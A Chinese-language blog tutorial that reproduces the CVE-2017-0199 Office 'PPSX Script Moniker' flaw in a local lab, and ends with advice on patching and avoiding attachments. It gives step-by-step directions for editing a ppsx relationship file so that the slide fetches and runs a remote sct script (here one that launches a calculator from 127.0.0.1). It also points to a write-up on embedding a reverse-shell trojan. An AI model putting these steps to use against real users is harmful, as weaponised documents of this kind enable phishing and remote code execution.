在剛剛結束的BlackHat2017黑帽大會上,最佳客戶端安全漏洞獎頒給了CVE-2017-0199漏洞,這個漏洞是Office系列辦公軟件中的一個邏輯漏洞,和常規的內存破壞型漏洞不同,這類漏洞無需復雜的利用手法,直接就可以在office文檔中運行任意的惡意腳本,使用起來穩定可靠,故而非常適合於漏洞學習新手測試調試使用,作為一個已經測試過該漏洞的新手,現將搭建環境和測試的全部過程呈獻給大家,希望能對大家的學習有所幫助。
CVE-2017-0199實際上包含兩個漏洞,其中一個稱為“RTF URL Moniker”漏洞,另一個被稱為“PPSX Script Moniker”漏洞,在這里我們演示一下PPSXScript Moniker漏洞的測試方式。
首先准備一台apache服務器,為了簡化配置apache的過程,在這里我們直接安裝xampp,XAMPP是一個把Apache網頁服務器與PHP、Perl及MariaDB集合在一起的安裝包,允許用戶可以在自己的電腦上輕易的建立網頁服務器,安裝起來十分簡單,無需配置其它設置。安裝完成后,我們打開IE瀏覽器,輸入http://127.0.0.1,如果能夠跳轉到XAMPP的歡迎界面,就認為服務器已經搭建成功了。
圖1:XAMPP歡迎界面
如果你安裝XAMPP時選擇的是默認路徑,那么你可以在C盤的根目錄下找到該軟件,下一步我們要做的工作時在服務器的目錄下添加一個sct腳本,此處作為測試該腳本是否執行,我們讓該腳本啟動一個計算器程序,sct腳本代碼如下:
圖2:啟動計算器腳本代碼
我們將該腳本命名為1.sct,存放在C:\xampp\htdocs\路徑下,以便於接下來我們使用的PPSX能夠鏈接並執行改腳本。
第三步,我們修改ppsx樣本文件,樣本的地址可以從https://github.com/temesgeny/ppsx-file-generator網址處下載到。下載到的文件中包含一個python腳本和生成好的template.ppsx,我們直接改造template.ppsx模板,首先將改文件的后綴名改為.zip,然后將壓縮文件解壓,解壓后的文件內容如下圖所示:
圖3:模板ppsx文件解壓后文件內容
我們在路徑ppt\slides\_rels下找到slide1.xml.rels文件,我們將圖中用藍色圈出的路徑用我們自己服務的地址來替換,即更改為Target="script:http://127.0.0.1/1.sct"
圖4:更改前slide1.xml.rels文件內容
更改完成后,我們將解壓的四個文件重新以zip的格式壓縮,這里注意不要直接壓縮上一層路徑的template文件夾,否則壓縮后會出現兩層文件夾,壓縮任務完成后,我們把壓縮文件的后綴名重新更正為template.ppsx,然后再次打開該文件,結果如下圖所示:
圖5:漏洞利用結果圖
可以觀察到,在打開ppsx文件后,我們嵌入在ppsx中的遠程地址鏈接並下載了1.sct腳本,然后執行了該腳本,成功的開啟了一個計算器程序。
關於RTF URL Moniker的漏洞測試在http://www.freebuf.com/articles/system/131969.html 這篇文章中寫的非常詳細了,實測能夠成功復現漏洞,在這里就不再重復贅述了。
最后給大家推薦幾個鏈接,在了解CVE-2017-0199漏洞的過程中,分別參考了這幾篇文章:
(1)《Moniker魔法:直接在Microsoft Office中運行腳本》http://bbs.pediy.com/thread-219234.htm 這篇文章對漏洞發現的過程和原理描述的非常清晰,對底層比較感興趣的同學可以了解學習一下
(2)http://www.freebuf.com/vuls/144054.html 這篇文章提供了一個ppsx的高級利用方式,在ppsx中嵌入了kali生成的回連木馬。
最后給廣大用戶朋友們提幾點建議,防止惡意程序給您帶來不必要的損失:
1. 及時更新最新補丁,安裝殺毒軟件,最大限度保證自己不受惡意軟件侵害
2. 若收到郵件包含附件,不要直接打開,很可能是利用這個漏洞進行攻擊釣魚郵件,一旦打開將直接中招,先查殺再打開,來歷不明的郵件別收
3. 網上下的word文檔、PPSX、PPT文件別隨意打開,先查殺。
希望小子的文章值得你收藏與轉發,關注安全小子,安全路上,你我同行:
